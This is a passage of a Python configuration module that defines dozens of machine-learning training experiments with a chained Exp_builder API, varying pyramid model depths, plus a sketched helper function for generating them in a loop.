ch032_1side_6__2side_6__3side_6_4side_3 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_6__3side_6_4side_3_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s6__3s6__4s3") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_6__3side_6_4side_3, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_6__3side_6_4side_4 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_6__3side_6_4side_4_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s6__3s6__4s4") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_6__3side_6_4side_4, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_6__3side_6_4side_5 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_6__3side_6_4side_5_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s6__3s6__4s5") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_6__3side_6_4side_5, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_6__3side_6_4side_6 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_6__3side_6_4side_6_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s6__3s6__4s6") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_6__3side_6_4side_6, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
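# --- Hedged sketch (illustration only; this module deliberately spells every builder
# out explicitly, which keeps each experiment line grep-able). Assuming the
# ch032_pyramid_* models are module-level names, one 1side block could equivalently
# be generated like this; _build_side_block is hypothetical and is never executed here.
def _build_side_block(n_1side, _models=None):
    _models = _models if _models is not None else globals()
    builders = {}
    for s2 in range(1, n_1side + 1):
        for s3 in range(1, s2 + 1):
            for s4 in range(1, s3 + 1):
                key = f"ch032_1side_{n_1side}__2side_{s2}__3side_{s3}_4side_{s4}"
                model = _models[f"ch032_pyramid_1side_{n_1side}__2side_{s2}__3side_{s3}_4side_{s4}_and_1s6_2s6"]
                builders[key] = (Exp_builder()
                    .set_basic("train", use_db_obj, model, use_loss_obj,
                               exp_dir=exp_dir, code_exe_path=code_exe_path,
                               describe_end=f"ch032_1s{n_1side}__2s{s2}__3s{s3}__4s{s4}")
                    .set_train_args(epochs=1)
                    .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5,
                                         it_down_step="half", it_down_fq=900)
                    .set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1))
                    .set_multi_model_reload_exp_builders_dict(
                        W_to_Cx_Cy=getattr(W_w_M_to_C_p20_pyr, key),
                        I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good)
                    .set_result_name(result_name=""))
    return builders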
# 1 3 6 10 15 21 "28" 36 45 55
# side7 OK 84
ch032_1side_7__2side_1__3side_1_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_1__3side_1_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s1__3s1__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_1__3side_1_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_2__3side_1_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_2__3side_1_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s2__3s1__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_2__3side_1_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_2__3side_2_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_2__3side_2_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s2__3s2__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_2__3side_2_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_2__3side_2_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_2__3side_2_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s2__3s2__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_2__3side_2_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_3__3side_1_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_3__3side_1_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s3__3s1__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_3__3side_1_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_3__3side_2_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_3__3side_2_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s3__3s2__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_3__3side_2_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_3__3side_2_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_3__3side_2_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s3__3s2__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_3__3side_2_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_3__3side_3_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_3__3side_3_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s3__3s3__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_3__3side_3_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_3__3side_3_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_3__3side_3_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s3__3s3__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_3__3side_3_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_3__3side_3_4side_3 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_3__3side_3_4side_3_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s3__3s3__4s3") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_3__3side_3_4side_3, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_4__3side_1_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_4__3side_1_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s4__3s1__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_4__3side_1_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_4__3side_2_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_4__3side_2_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s4__3s2__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_4__3side_2_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_4__3side_2_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_4__3side_2_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s4__3s2__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_4__3side_2_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_4__3side_3_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_4__3side_3_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s4__3s3__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_4__3side_3_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_4__3side_3_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_4__3side_3_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s4__3s3__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_4__3side_3_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_4__3side_3_4side_3 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_4__3side_3_4side_3_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s4__3s3__4s3") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_4__3side_3_4side_3, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_4__3side_4_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_4__3side_4_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s4__3s4__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_4__3side_4_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_4__3side_4_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_4__3side_4_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s4__3s4__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_4__3side_4_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_4__3side_4_4side_3 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_4__3side_4_4side_3_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s4__3s4__4s3") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_4__3side_4_4side_3, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_4__3side_4_4side_4 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_4__3side_4_4side_4_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s4__3s4__4s4") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_4__3side_4_4side_4, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_5__3side_1_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_5__3side_1_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s5__3s1__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_5__3side_1_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_5__3side_2_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_5__3side_2_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s5__3s2__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_5__3side_2_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_5__3side_2_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_5__3side_2_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s5__3s2__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_5__3side_2_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_5__3side_3_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_5__3side_3_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s5__3s3__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_5__3side_3_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_5__3side_3_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_5__3side_3_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s5__3s3__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_5__3side_3_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_5__3side_3_4side_3 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_5__3side_3_4side_3_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s5__3s3__4s3") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_5__3side_3_4side_3, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_5__3side_4_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_5__3side_4_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s5__3s4__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_5__3side_4_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_5__3side_4_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_5__3side_4_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s5__3s4__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_5__3side_4_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_5__3side_4_4side_3 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_5__3side_4_4side_3_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s5__3s4__4s3") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_5__3side_4_4side_3, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_5__3side_4_4side_4 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_5__3side_4_4side_4_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s5__3s4__4s4") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_5__3side_4_4side_4, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_5__3side_5_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_5__3side_5_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s5__3s5__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_5__3side_5_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_5__3side_5_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_5__3side_5_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s5__3s5__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_5__3side_5_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_5__3side_5_4side_3 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_5__3side_5_4side_3_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s5__3s5__4s3") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_5__3side_5_4side_3, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_5__3side_5_4side_4 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_5__3side_5_4side_4_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s5__3s5__4s4") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_5__3side_5_4side_4, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
